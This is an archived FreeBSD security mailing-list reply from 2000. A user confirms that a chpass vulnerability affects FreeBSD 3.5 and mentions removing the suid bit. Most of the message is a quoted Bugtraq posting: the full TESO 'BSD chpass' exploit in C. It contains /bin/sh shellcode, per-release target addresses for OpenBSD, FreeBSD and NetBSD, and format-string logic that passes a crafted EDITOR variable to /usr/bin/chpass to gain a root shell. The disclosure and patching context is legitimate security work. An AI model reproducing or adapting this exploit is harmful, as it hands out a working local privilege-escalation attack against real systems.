From owner-freebsd-security Tue Oct 3 22:17: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id EE6FA37B66C for ; Tue, 3 Oct 2000 22:16:58 -0700 (PDT) Received: (qmail 79741 invoked by uid 1000); 4 Oct 2000 05:16:53 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:16:53 -0000 Date: Wed, 4 Oct 2000 01:16:50 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: <4.2.2.20001004011210.035225e0@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be vulnerable in a method outside the scope of the posted exploit. I just found out about this 5 minutes and ran to turn off the suid bit :P On Wed, 4 Oct 2000, Mike Tancsa wrote: : Date: Wed, 4 Oct 2000 01:12:59 -0400 : From: Mike Tancsa : To: freebsd-security@freebsd.org : Subject: Fwd: BSD chpass : : : OK, here is a nasty bugtraq posting :-( : : ---Mike : : : >Approved-By: aleph1@SECURITYFOCUS.COM : >Delivered-To: bugtraq@lists.securityfocus.com : >Delivered-To: bugtraq@securityfocus.com : >User-Agent: Mutt/1.2i : >Date: Wed, 4 Oct 2000 02:45:48 +1000 : >Reply-To: caddis : >Sender: Bugtraq List : >From: caddis : >Subject: BSD chpass : >To: BUGTRAQ@SECURITYFOCUS.COM : > : >/* : > * TESO BSD chpass exploit - caddis : > * : > * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613 : > * : > */ : >#include : > : >char bsd_shellcode[] = : >"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" : >"\x4e\x08\x89\x46\x0c\x8d\x4e\x08" : >"\x50\x51\x56\x50\xb0\x3b\xcd\x80" : >"\xe8\xe5\xff\xff\xff/bin/sh"; : > : >char ptmp_shellcode[] = : >"\xeb\x26\x5e\x31\xdb\x88\x5e\x07" : >"\x89\x76\x12\x89\x5e\x16\x8d\x4e" : >"\x12\x8d\x56\x08\x31\xc0\x52\x53" : >"\xb0\x0a\xcd\x80\x53\x51\x56\x53" : >"\xb0\x3b\xcd\x80\xb0\x01\xcd\x80" : >"\xe8\xd5\xff\xff\xff/bin/sh!/etc/ptmp"; : > : >struct platform { : > char *name; : > unsigned short count; : > unsigned long dest_addr; : > unsigned long shell_addr; : > char *shellcode; : >}; : > : >struct platform targets[9] = : >{ : > { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, : > ptmp_shellcode }, : > { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, : > ptmp_shellcode }, : > { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, : > ptmp_shellcode }, : > { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, : > ptmp_shellcode }, : > { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, : > bsd_shellcode }, : > { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, : > bsd_shellcode }, : > { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, : > bsd_shellcode }, : > { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, : > bsd_shellcode }, : > { NULL, 0, 0, 0, NULL } : >}; : > : >char jmpcode[129]; : >char fmt_string[1000]; : > : >char *args[] = { "chpass", NULL }; : >char *envs[] = { jmpcode, fmt_string, NULL }; : > : >void usage(char *name) : >{ : > printf("%s \n" : > "1 - OpenBSD 2.7 i386\n" : > "2 - OpenBSD 2.6 i386\n" : > "3 - OpenBSD 2.5 1999/08/06\n" : > "4 - OpenBSD 2.5 1998/05/28\n" : > "5 - FreeBSD 4.0-RELEASE\n" : > "6 - FreeBSD 3.5-RELEASE\n" : > "7 - FreeBSD 3.4-RELEASE\n" : > "8 - NetBSD 1.4.2\n", name); : > exit(1); : >} : > : >int main(int argc, char *argv[]) : >{ : > char *p; : > int x, len = 0; : > struct platform *target; : > unsigned short low, high; : > unsigned long shell_addr[2], dest_addr[2]; : > : > if (argc != 2) : > usage(argv[0]); : > : > x = atoi(argv[1]) - 1; : > if (x > ((sizeof(targets)-sizeof(struct platform)) / sizeof(struct : > platform)) - 1 || x < 0) : > usage(argv[0]); : > : > target = &targets[x]; : > : > memset(jmpcode, 0x90, sizeof(jmpcode)); : > strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode), : > target->shellcode); : > : > strcat(fmt_string, "EDITOR="); : > for (x = 0; x < target->count; x++) { : > strcat(fmt_string, "%8x"); : > len += 8; : > } : > : > shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16; : > shell_addr[1] = target->shell_addr & 0xffff; : > : > if (shell_addr[1] > shell_addr[0]) { : > dest_addr[0] = target->dest_addr+2; : > dest_addr[1] = target->dest_addr; : > low = shell_addr[0] - len; : > high = shell_addr[1] - low - len; : > } else { : > dest_addr[0] = target->dest_addr; : > dest_addr[1] = target->dest_addr+2; : > low = shell_addr[1] - len; : > high = shell_addr[0] - low - len; : > } : > : > *(long *)&jmpcode[1] = 0x11111111; : > *(long *)&jmpcode[5] = dest_addr[0]; : > *(long *)&jmpcode[9] = 0x11111111; : > *(long *)&jmpcode[13] = dest_addr[1]; : > : > p = fmt_string + strlen(fmt_string); : > sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high); : > : > execve("/usr/bin/chpass", args, envs); : > perror("execve"); : >} : : -------------------------------------------------------------------- : Mike Tancsa, tel +1 519 651 3400 : Network Administration, mike@sentex.net : Sentex Communications www.sentex.net : Cambridge, Ontario Canada www.sentex.net/mike : : : : To Unsubscribe: send mail to majordomo@FreeBSD.org : with "unsubscribe freebsd-security" in the body of the message : * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE52r1FdMMtMcA1U5ARAnXAAKDhwrEZYJf6/88mIaFOgPFVgGl3SACfTWwx L1I064VgjK87cIBOI3FonT8= =Jzcy -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message